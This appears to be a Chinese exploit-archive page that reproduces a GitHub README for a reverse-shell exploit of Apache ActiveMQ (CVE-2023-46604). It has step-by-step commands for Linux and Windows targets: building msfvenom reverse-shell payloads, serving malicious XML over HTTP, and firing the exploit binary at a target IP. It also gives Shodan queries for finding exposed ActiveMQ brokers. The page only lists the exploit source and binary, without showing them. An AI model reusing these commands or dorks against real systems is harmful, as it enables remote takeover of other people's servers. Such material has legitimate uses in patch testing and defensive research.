POC详情: ca0234639260e611149db2c67b82b9d482cda75f

来源
https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
关联漏洞
标题: Apache ActiveMQ 代码问题漏洞 (CVE-2023-46604)
描述:Apache ActiveMQ是美国阿帕奇(Apache)基金会的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.15.16之前、5.16.7之前、5.17.6之前或5.18.3之前版本存在代码问题漏洞,该漏洞源于允许具有代理网络访问权限的远程攻击者通过操纵 OpenWire 协议中的序列化类类型来运行任意 shell 命令。
描述
 Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)
介绍
# CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
This exploit builds upon the foundational work available at https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). We have further developed the technique to achieve a reverse shell utilizing the Metasploit Framework (https://github.com/rapid7/metasploit-framework).

# Usage:
<b>Important: Manually change the IP Address (0.0.0.0 on line 11) in the XML files with the IP Address where the payload will be generated. If u follow the below commands it will be your Listner IP Addess. Also {IP_Of_Hosted_XML_File} will be your Listner IP Address.</b>

For Linux/Unix Targets
```
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
```

For Windows Targets
```
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml
```

![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/db1b82e4-55ef-4f23-9df7-8a0cf99c01c4)

# Shodan Dork:
- product:"ActiveMQ OpenWire Transport"
- ![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/6d560881-7855-474b-8c8b-3fb5a3f09a94)
- product:"ActiveMQ OpenWire Transport" port:61616
- ![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/1e073ec0-690e-40b1-bcc0-cb9390ca6b7c)



# Original Work:
- https://github.com/X1r0z/ActiveMQ-RCE

# For More Reading:
- https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
- https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
- https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis

A special thanks to https://github.com/Anon4mous for actively supporting me.
文件快照

 [4.0K]  /data/pocs/ca0234639260e611149db2c67b82b9d482cda75f
├── [2.8M]  ActiveMQ-RCE.exe
├── [  29]  go.mod
├── [1.6K]  main.go
├── [ 716]  poc-linux.xml
├── [ 717]  poc-windows.xml
└── [2.3K]  README.md

0 directories, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。